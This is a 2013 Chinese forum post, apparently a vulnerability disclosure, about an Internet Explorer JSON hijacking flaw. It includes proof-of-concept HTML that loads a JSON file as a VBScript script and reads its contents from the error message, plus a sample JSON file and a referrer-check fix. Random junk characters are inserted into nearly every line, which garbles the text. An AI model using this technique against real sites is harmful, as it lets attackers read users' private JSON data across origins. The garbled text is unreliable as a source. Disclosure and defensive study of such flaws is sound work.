找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2068|回复: 0
打印 上一主题 下一主题

IE通用JSON劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:33:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:3 e( ?( y  d- Z3 C' ?" z7 s
) r& p) v. ]' A; s# Q  F; G
由于某些资源容器对数据处理不当导致json劫持漏洞.& T: Q$ A0 H) V
详细说明:8 z! ~" Q8 P; H
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
7 W" m2 Y3 r: S& t6 V" Z<script language=vbscript></script>/ y, I# L% [0 V; a3 K8 b9 Y; i

( P) p9 U- r8 m  I3 g! e  p- V; n4 m当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
; G( r. f9 e% Q: @5 u, `1 H漏洞证明:  C% S; t# w3 W7 T/ h
<script>$ j1 M% T7 j  m9 }
window.onerror=function(_){
% Y6 ]( L8 ^! b8 U; jalert(_)
0 o2 i, b: d3 s- A4 D1 ^5 U+ f6 u}
1 p7 o4 E/ ~5 y1 N3 t+ \5 }4 k& n</script>
, n- E  c$ H0 o+ }! b0 a<script language=vbscript src=1.json></script>4 R( e+ C5 {4 p0 Q" N

' c; O4 E, t' e! J2 M$ k
. D7 ?) `, b3 v1.json:
  o7 a1 B5 c( N" g) y" g[{"name":"sogili","age":19}]
' h, ^3 F; K! ~* G0 L修复方案:' _" g: P* \/ n; i, a
网站业务对于这个问题可以通过验证referrer是否为同源来防御
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表